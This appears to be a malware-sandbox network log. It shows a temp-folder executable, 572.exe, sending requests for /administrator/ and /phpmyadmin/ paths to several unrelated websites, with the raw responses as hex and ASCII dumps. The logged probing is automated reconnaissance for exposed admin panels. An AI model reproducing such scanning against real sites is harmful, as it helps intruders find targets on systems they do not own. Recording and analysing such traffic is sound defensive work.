                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC7390INData Raw: 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 20 72 6f 75 74 65 72 6c 69 6e 6b 3d 22 2f 61 66 66 69 6c 69 61 74 6f 72 2d 70 61 67 65 22 20 68 72 65 66 3d 22 2f 61 66 66 69 6c 69 61 74 6f 72 2d 70 61 67 65 22 3e 20 42 65 63 6f 6d 65 20 61 6e 20 41 66 66 69 6c 69 61 74 65 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 3e 3c 61 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 20 72 6f 75 74 65 72 6c 69 6e 6b 3d 22 2f 68 6f 77 2d 69 74 2d 77 6f 72 6b 73 22 20 68 72 65 66 3d 22 2f 68 6f 77 2d 69 74 2d 77 6f 72 6b 73 22 3e 20 48 6f 77 20 49 74 20 57 6f 72 6b 73 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 3e 3c 61 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ngcontent-sc91="" routerlink="/affiliator-page" href="/affiliator-page"> Become an Affiliate </a></li><li _ngcontent-sc91=""><a _ngcontent-sc91="" routerlink="/how-it-works" href="/how-it-works"> How It Works </a></li><li _ngcontent-sc91=""><a _ngcontent-
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC4369INData Raw: 74 2d 73 63 32 37 31 3d 22 22 20 5f 6e 67 68 6f 73 74 2d 73 63 32 37 30 3d 22 22 3e 3c 64 69 76 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 37 30 3d 22 22 20 69 64 3d 22 73 68 61 72 65 4d 6f 64 61 6c 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 65 78 61 6d 70 6c 65 4d 6f 64 61 6c 4c 61 62 65 6c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 20 66 61 64 65 22 3e 3c 64 69 76 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 37 30 3d 22 22 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 22 3e 3c 64 69 76 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 37 30 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t-sc271="" _nghost-sc270=""><div _ngcontent-sc270="" id="shareModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true" class="modal fade"><div _ngcontent-sc270="" role="document" class="modal-dialog"><div _ngcontent-sc270=


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                81192.168.2.656012138.197.59.199443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC187OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC585INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=fAVl_OzmAbKHuY8hGNs8itqM.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC554INData Raw: 32 31 65 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 3e 3c 2f 6c 69 6e 6b 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 2d 20 4c 61 20 70 c3 a1 67 69 6e 61 20 6e 6f 20 65 78 69 73 74 65 3c 2f 74 69 74 6c 65 3e 09 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                82192.168.2.654708104.22.74.220443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1186INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb794fa11395-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC183INData Raw: 33 35 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 357a<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" cont
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 74 79 6c 65 3e 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ent="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 29 3b 7d 7d 40 6d 69 78 69 6e 20 6c 69 67 68 74 2d 6d 6f 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 63 6f 6c 6f 72 3a 20 23 33 31 33 31 33 31 3b 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 30 30 35 31 63 33 3b 20 26 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 65 65 37 33 30 61 3b 7d 7d 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 20 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 20 2e 66 6f 6e 74 2d 72 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 66 63 35 37 34 61 3b 7d 20 2e 62 69 67 2d 62 75 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oiLz48L3N2Zz4);}}@mixin light-mode{background-color: transparent; color: #313131; a {color: #0051c3; &:hover {text-decoration: underline; color: #ee730a;}} .lds-ring div {border-color: #595959 transparent transparent;} .font-red {color: #fc574a;} .big-but
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2c 2e 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: gin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-heig
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mage:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGEx
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .5rem}.footer .ray-id{text-align:center;code{font-family:monaco,courier,monospace}}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (width <= 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:i
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 6d 6f 6a 61 64 6f 76 65 72 61 2e 73 6b 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 36 39 33 36 32 27 2c 63 52 61 79 3a 20 27 38 35 30 61 62 62 37 39 34 66 61 31 31 33 39 35 27 2c 63 48 61 73 68 3a 20 27 63 37 34 63 31 31 65 62 62 36 65 37 33 34 37 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 70 68 70 6d 79 61 64 6d 69 6e 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4c 55 7a 4b 59 38 44 4d 4e 35 2e 59 73 64 47 73 58 6c 62 46 54 69 77 48 71 4f 69 55
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "mojadovera.sk",cType: 'managed',cNounce: '69362',cRay: '850abb794fa11395',cHash: 'c74c11ebb6e7347',cUPMDTk: "\/phpmyadmin\/?__cf_chl_tk=LUzKY8DMN5.YsdGsXlbFTiwHqOiU
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 49 5a 31 56 68 4c 32 4c 55 6c 39 57 33 53 65 47 74 47 34 39 57 55 4e 38 70 52 31 54 64 71 32 76 43 51 66 38 30 69 55 58 38 33 41 73 51 78 54 45 6e 65 74 56 36 43 72 57 6f 4e 79 4f 53 76 57 73 72 4b 4c 70 77 33 49 74 74 72 65 7a 55 63 35 32 34 38 39 68 6c 4d 56 56 61 4a 33 70 76 5f 6a 61 68 7a 67 64 62 77 32 74 6d 77 47 44 66 4c 64 6c 59 55 50 6c 32 31 55 6a 56 52 44 67 7a 4f 7a 74 6f 39 67 32 75 2d 4d 4e 68 48 47 77 4f 33 66 4f 76 57 2d 30 51 56 5f 62 53 73 48 46 6d 76 77 56 68 34 62 65 46 5f 6f 68 76 71 68 50 66 62 46 59 33 78 4b 42 64 6d 43 50 58 7a 5f 59 76 78 51 2d 5a 71 74 6c 63 36 66 37 31 7a 33 59 4f 6e 75 4d 35 4d 49 2d 67 4f 31 6d 48 6d 49 74 43 32 4b 4e 39 35 6b 54 31 59 6a 72 41 36 68 75 53 6e 53 63 73 46 62 5a 41 47 69 64 6a 56 56 78 37 2d 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: IZ1VhL2LUl9W3SeGtG49WUN8pR1Tdq2vCQf80iUX83AsQxTEnetV6CrWoNyOSvWsrKLpw3IttrezUc52489hlMVVaJ3pv_jahzgdbw2tmwGDfLdlYUPl21UjVRDgzOzto9g2u-MNhHGwO3fOvW-0QV_bSsHFmvwVh4beF_ohvqhPfbFY3xKBdmCPXz_YvxQ-Zqtlc6f71z3YOnuM5MI-gO1mHmItC2KN95kT1YjrA6huSnScsFbZAGidjVVx7-r
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 46 5a 78 78 62 7a 39 59 6c 70 35 46 37 59 39 7a 59 58 75 42 67 34 62 6d 74 51 53 76 63 50 41 6a 71 43 63 52 44 30 5f 4c 57 62 77 4e 59 6f 75 31 76 73 72 2d 4d 36 4a 7a 75 6c 55 54 4f 74 2d 69 39 62 7a 74 6b 64 57 55 53 35 31 67 6d 30 58 7a 37 36 79 4d 71 59 79 51 63 78 5a 33 38 6a 45 70 42 5f 36 66 61 36 70 52 52 36 45 6d 41 38 67 6a 65 39 78 45 33 74 44 4b 4a 63 4d 53 64 67 59 76 6a 6d 43 48 64 52 2d 70 63 32 56 39 6a 61 6a 77 4b 62 50 44 38 4b 72 67 67 44 71 6b 6c 4c 49 55 75 62 47 76 31 79 6d 74 30 72 31 61 57 59 55 6f 64 7a 75 4d 4a 39 6b 4d 32 6d 4d 74 78 76 7a 64 31 78 44 79 69 55 47 37 64 41 6c 52 45 6a 30 74 33 79 41 6f 34 71 4a 73 38 52 58 31 30 37 5f 64 5f 63 65 77 48 48 36 48 30 78 37 63 4f 6c 41 35 78 56 30 55 50 35 62 58 77 71 74 48 36 70 4e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: FZxxbz9Ylp5F7Y9zYXuBg4bmtQSvcPAjqCcRD0_LWbwNYou1vsr-M6JzulUTOt-i9bztkdWUS51gm0Xz76yMqYyQcxZ38jEpB_6fa6pRR6EmA8gje9xE3tDKJcMSdgYvjmCHdR-pc2V9jajwKbPD8KrggDqklLIUubGv1ymt0r1aWYUodzuMJ9kM2mMtxvzd1xDyiUG7dAlREj0t3yAo4qJs8RX107_d_cewHH6H0x7cOlA5xV0UP5bXwqtH6pN
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 54 78 77 51 7a 4f 79 30 70 54 49 39 68 77 76 6e 76 76 4e 63 77 4b 4d 76 4f 50 78 5a 48 65 35 75 74 33 44 49 37 6e 56 6e 64 4e 48 73 48 73 56 34 58 67 52 48 75 75 4b 5f 32 76 6b 54 66 70 4c 59 54 52 5f 4e 48 42 75 66 51 49 6e 48 67 56 2d 59 53 70 4f 57 65 31 69 6f 55 73 5f 32 67 44 6c 37 57 4b 43 68 6e 6a 76 32 52 34 4c 42 46 6c 38 4f 4e 65 48 48 4d 52 47 6a 70 62 56 4e 53 58 39 50 31 52 42 54 73 42 47 55 6c 44 36 30 7a 44 4a 76 62 42 6d 70 6b 6b 69 68 50 6d 50 31 63 73 31 6a 7a 73 37 65 36 30 41 73 35 33 6d 70 37 4a 57 33 62 63 41 66 76 78 48 37 4f 54 75 54 6c 7a 71 37 62 61 68 41 42 4e 32 22 2c 63 52 71 3a 20 7b 72 75 3a 20 27 61 48 52 30 63 48 4d 36 4c 79 39 74 62 32 70 68 5a 47 39 32 5a 58 4a 68 4c 6e 4e 72 4c 33 42 6f 63 47 31 35 59 57 52 74 61 57 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: TxwQzOy0pTI9hwvnvvNcwKMvOPxZHe5ut3DI7nVndNHsHsV4XgRHuuK_2vkTfpLYTR_NHBufQInHgV-YSpOWe1ioUs_2gDl7WKChnjv2R4LBFl8ONeHHMRGjpbVNSX9P1RBTsBGUlD60zDJvbBmpkkihPmP1cs1jzs7e60As53mp7JW3bcAfvxH7OTuTlzq7bahABN2",cRq: {ru: 'aHR0cHM6Ly9tb2phZG92ZXJhLnNrL3BocG15YWRtaW4


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                83192.168.2.65601134.149.46.130443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=be8e7c19-3bb8-4c8a-aaf1-075b8b3f9a02; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:53 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' 